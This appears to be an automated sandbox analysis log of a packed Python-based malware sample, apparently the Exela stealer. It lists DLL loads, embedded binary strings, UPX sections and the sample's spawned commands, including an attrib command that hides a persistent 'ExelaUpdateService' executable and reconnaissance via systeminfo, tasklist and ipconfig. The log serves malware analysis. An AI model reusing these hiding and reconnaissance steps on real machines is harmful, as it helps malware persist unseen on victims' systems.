Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\ipconfig.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\ROUTE.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ROUTE.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ROUTE.EXE Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ROUTE.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\ARP.EXE Section loaded: snmpapi.dll
Source: C:\Windows\System32\ARP.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ARP.EXE Section loaded: inetmib1.dll
Source: C:\Windows\System32\ARP.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ARP.EXE Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ARP.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\NETSTAT.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\NETSTAT.EXE Section loaded: snmpapi.dll
Source: C:\Windows\System32\NETSTAT.EXE Section loaded: inetmib1.dll
Source: C:\Windows\System32\NETSTAT.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\Desktop\pyvenv.cfg Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe Static file information: File size 9934907 > 1048576
Source: Binary string: C:\A\34\b\bin\amd64\_sqlite3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458402101.00007FFDA3AE1000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\select.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460538535.00007FFDA5491000.00000040.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdbMM source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457809177.00007FFDA36FB000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_bz2.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459049746.00007FFDA4161000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: cryptography_rust.pdbc source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: Binary string: C:\A\34\b\bin\amd64\sqlite3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457000685.00007FFDA3435000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_hashlib.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2456611424.00007FFDA32F1000.00000040.00000001.01000000.00000015.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.pdb source: powershell.exe, 00000051.00000002.2305154049.00000260C2523000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: crypto\bn\bn_ctx.cBN_CTX_startBN_CTX_getossl_ec_group_new_excrypto\ec\ec_lib.cEC_GROUP_copyEC_GROUP_set_generatorEC_GROUP_set_curveEC_GROUP_get_curveEC_GROUP_get_degreeEC_GROUP_check_discriminantEC_POINT_newEC_POINT_copyEC_POINT_set_to_infinityEC_POINT_set_Jprojective_coordinates_GFpEC_POINT_set_affine_coordinatesEC_POINT_get_affine_coordinatesEC_POINT_addEC_POINT_dblEC_POINT_invertEC_POINT_is_at_infinityEC_POINT_is_on_curveEC_POINT_cmpEC_POINT_mulEC_GROUP_get_trinomial_basisEC_GROUP_get_pentanomial_basisgroup_new_from_nameossl_ec_group_set_paramsencodingdecoded-from-explicitEC_GROUP_new_from_paramsgeneratorcrypto\evp\digest.cevp_md_ctx_new_exevp_md_ctx_free_algctxevp_md_init_internalEVP_DigestUpdatesizeEVP_DigestFinal_exassertion failed: mdsize <= EVP_MAX_MD_SIZEEVP_DigestFinalXOFxoflenEVP_MD_CTX_copy_exEVP_MD_CTX_ctrlmicalgssl3-msblocksizexofalgid-absentevp_md_from_algorithmupdatecrypto\evp\m_sigver.cUNDEFdo_sigver_initEVP_DigestSignUpdateEVP_DigestVerifyUpdateEVP_DigestSignFinalEVP_DigestSignEVP_DigestVerifyFinalEVP_DigestVerifycompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.3.2built on: Fri Oct 18 00:15:00 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: ossl_ec_GFp_simple_group_set_curvecrypto\ec\ecp_smpl.cossl_ec_GFp_simple_group_check_discriminantossl_ec_GFp_simple_point_set_affine_coordinatesossl_ec_GFp_simple_point_get_affine_coordinatesossl_ec_GFp_simple_make_affineossl_ec_GFp_simple_points_make_affineossl_ec_GFp_simple_field_invossl_ec_GFp_simple_blind_coordinatescrypto\user\tb_digest.cuser_get_digestcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_socket.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459264735.00007FFDA4331000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_ctypes.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458028141.00007FFDA3711000.00000040.00000001.01000000.00000007.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457809177.00007FFDA36FB000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_asyncio.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458199558.00007FFDA3A81000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\python3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440853445.0000018B46A80000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-1_1"not available source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
Source: Binary string: d:\a01\_work\4\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119754812.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460318251.00007FFDA5471000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_ssl.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457310056.00007FFDA3531000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_overlapped.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459813174.00007FFDA4DA1000.00000040.00000001.01000000.00000013.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\python310.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454057077.00007FFD943CE000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457000685.00007FFDA3435000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.pdbhP source: powershell.exe, 00000051.00000002.2305154049.00000260C2523000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_queue.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458841393.00007FFDA3FD1000.00000040.00000001.01000000.00000023.sdmp
Source: Binary string: cryptography_rust.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_uuid.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459552942.00007FFDA4631000.00000040.00000001.01000000.0000001D.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\unicodedata.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2448990282.00007FFD93CFB000.00000040.00000001.01000000.00000017.sdmp
Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD94064460 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect, 2_2_00007FFD94064460
Source: VCRUNTIME140.dll.0.dr Static PE information: section name: _RDATA
Source: libffi-7.dll.0.dr Static PE information: section name: UPX2
Source: _rust.pyd.0.dr Static PE information: section name: UPX2
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6C31 push r10; ret 2_2_00007FFD93BF6C33
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6F42 push r12; ret 2_2_00007FFD93BF6F5A
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6E54 push rdi; iretd 2_2_00007FFD93BF6E56
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6EE0 push r12; ret 2_2_00007FFD93BF6EFE
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6CFA push rdx; ret 2_2_00007FFD93BF6D01
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF77FA push rsi; ret 2_2_00007FFD93BF7831
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BFA2F5 push rsp; retf 2_2_00007FFD93BFA2F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF92F4 push r10; retf 2_2_00007FFD93BF9360
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6E0B push rsp; ret 2_2_00007FFD93BF6E13
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6D06 push r12; ret 2_2_00007FFD93BF6D08
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF9C12 push rsp; retf 2_2_00007FFD93BF9C13
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF8F0E push r12; ret 2_2_00007FFD93BF8F35
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6EAB push rsi; ret 2_2_00007FFD93BF6EAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6F9D push r10; ret 2_2_00007FFD93BF6FB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BFA4B9 push rdx; ret 2_2_00007FFD93BFA510
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF85B7 push r12; ret 2_2_00007FFD93BF85F3
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF91B3 push rdi; iretd 2_2_00007FFD93BF91B5
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6EC6 push r10; retf 2_2_00007FFD93BF6EC9
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6CDC push r8; ret 2_2_00007FFD93BF6CE9
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF856C push rbp; retf 2_2_00007FFD93BF8585
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6F64 push r8; ret 2_2_00007FFD93BF6F6C
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF8F63 push r12; iretd 2_2_00007FFD93BF8F7A
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF8E76 push rbp; iretq 2_2_00007FFD93BF8E77
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BFA174 push rsp; ret 2_2_00007FFD93BFA175
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF6E9C push rsp; iretd 2_2_00007FFD93BF6E9D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93BF9D95 push rsp; iretq 2_2_00007FFD93BF9D96
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 81_2_00007FFD33056329 push ecx; ret 81_2_00007FFD3305632C
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_queue.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_writer.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_ssl.pyd Jump to dropped file
